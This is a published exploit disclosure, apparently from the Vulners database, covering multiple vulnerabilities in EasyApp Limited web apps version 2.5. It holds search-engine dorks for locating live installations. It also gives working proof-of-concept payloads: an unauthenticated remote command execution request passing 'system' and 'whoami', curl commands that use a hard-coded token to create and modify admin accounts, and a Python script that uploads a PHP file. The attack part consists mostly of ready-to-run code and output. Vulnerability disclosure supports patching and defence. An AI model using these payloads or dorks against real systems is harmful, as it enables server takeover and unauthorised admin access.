Vulners
Lucene search
📄 EasyApp Limited 2.5 Remote Code Execution / Deserialization / File Upload
# Exploit Title: EasyApp Limited - Multiple Vulnerabilities
# Date: 2025-06-27
# Exploit Author: bRpsd -> cy[at]live.no
# Vendor Homepage: https://easyapp.com.hk/
# Products: Easy Shop, Easy Food, Handlebook
# Affected Versions: v2.5 and below
# CVE: N/A
# Tested on: localhost xampp, MacOS
# Dorks:
"Powered By Easyapp © 2025"
Powered By EasyApp Limited inurl:app/web
"Powered By EasyApp Limited"
"DESIGN BY HANDLEBOOK EDUCATION SOLUTIONS © 2025"
"EasyApp Login"
inurl:/web/product_detail.php?linkid=
inurl:app/admin2/login.php
inurl:app/#!/template/newsList.php
##########################################################################################
Vulnerability: PHP Object Injection "CWE-502: Deserialization of Untrusted Data"
The function directly processes unsanitized JSON input from php://input leading to Unauthenticated RCE
File: /app/php/data.php
Code:
=================================================================================
$path = $_SERVER['DOCUMENT_ROOT'];
include_once($path);
$json = json_decode(file_get_contents("php://input"),true) ;
// Calling Custom Function
echo json_encode($json["action"]($json["data"]));
=================================================================================
POC:
==========================================================================================
POST https://localhost/app/php/data.php HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 35
Connection: keep-alive
Cookie: _ga_RRH2QH5VDJ=GS2.1.s1755785674$o1$g1$t1755785674$j60$l0$h0; _ga=GA1.1.1404825214.1755785674
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"action":"system","data":"whoami"}
Response:
HTTP/1.1 200 OK
Date: Thu, 15 Aug 2025 14:19:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
root
"root"
Using CURL:
curl -X POST https://localhost/app/php/data.php \
-H "Content-Type: application/json" \
-d '{"action":"system","data":"uname"}'
"Darwin"
##########################################################################################
Vulnerability 2: Static Token Bypass (CWE-798: Use of Hard-coded Credentials)
File: /app/admin2/php/data.php
Code:
=================================================================================
function getAppAccessRight($functionName,$param)
{
$data = array();
$data["status"] = "SUCCESS" ;
$uid = $_COOKIE["uid"] ;
$token = $_COOKIE["token"] ;
$escapeFunction = ESCAPE_FUNC_TOKEN ;
// echo $functionName . "<br/>";
// echo $escapeFunction . "<br/>";
if (strpos($escapeFunction, $functionName) !==false)
return $data ;
if ($token == "abcdefghijklmnopqrstuvwxyz1234567890")
return $data ;
=================================================================================
This means calling arbitrary admin functions via /app/admin2/php/data.php can be easily bypassed,We can use this hard-coded token to (create admin, update an admin) and trigger MANY other admin-based functions directly:
POC:
==========================================================================================
curl -X POST \
'https://localhost/app/admin2/php/data.php' \
-H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
-H 'Content-Type: application/json' \
-d '{
"action": "updateAdmin",
"data": {
"fullname": "X",
"loginid": "XXXXXXXXXX",
"pwd": "XXXXXXXXXX",
"email": "[email protected]",
"role": "ADMIN",
"userid": "1",
"imgattachid": "1"
}
}'
Response:
{"uid":"UID_HERE","status":"SUCCESS"}
curl -X POST \
'https://localhost/app/admin2/php/data.php' \
-H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
-H 'Content-Type: application/json' \
-d '{
"action": "createAdmin",
"data": {
"fullname": "X",
"loginid": "X",
"pwd": "X",
"email": "[email protected]",
"role": "ADMIN",
"userid": "1",
"imgattachid": "1"
}
}'
Response:
{"uid":"UID_HERE","status":"SUCCESS"}
==========================================================================================
##########################################################################################
Vulnerability: Unauthenticated Arbitrary File UPLOAD,DELETE & Exposure
path: app/admin2/userimg
Direct access expose list of files uploaded to the directory /app/admin2/userimg/:
Example:
{"files":[{"name":"x.jpg","size":4,"url":"https:\/\/localhost\/app\/admin2\/userimg\/files\/x.jpg","deleteUrl":"https:\/\/localhost.hk\/app\/admin2\/userimg\/index2.php?file=x.jpg","deleteType":"DELETE"}]}
We can run direct commands to upload/delete
Python Code for uploading a test.php:
==========================================================================================
import requests
# Define the URL and headers
url = "https://localhost/app/admin2/userimg/"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br, zstd",
"X-Requested-With": "XMLHttpRequest",
"Origin": "https://localhost/",
"Connection": "keep-alive",
"Referer": "https://localhost/app/admin2/news-list-add.php",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin"
}
# Payload to accept file (some settings allow direct PHP upload, others don't)
payload = {
'attachid': '1',
'gtitle_zh': '1',
'linkid': '1'
}
files = {
'files[]': ('x.PhP', 'test', 'multipart/form-data')
}
response = requests.post(url, headers=headers, data=payload, files=files)
# Print the response
print(f"Status Code: {response.status_code}")
print("Response Text:", response.text)
==========================================================================================
Too lazy to list the OTHER weakness points such as:
1- Using HTML JS redirection to prevent admin access [/app/admin2/] instead of PHP-based code. Meaning anyone can view admin dashboard and its HTML source code & tamper around.
2- IP Address Spoofing by relying on HTTP_CLIENT_IP or HTTP_X_FORWARDED_FOR headers for authentication which can be spoofed
3- Weak Cryptography
4- No CSRF/XSS/SQLi control
5- Imporoper control of code generation like using "strpos($escapeFunction, $functionName)" instead of "strpos($functionName, $escapeFunction)", Misspelled "TRUE" as "TURE" in 2FA activation..
6- Accessible test files in paths like /app/admin2/testFn.php [Arbitrary File Upload], along with other vulnerable endpointsData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Aug 2025 00:00Current
8.3High risk
Vulners AI Score8.3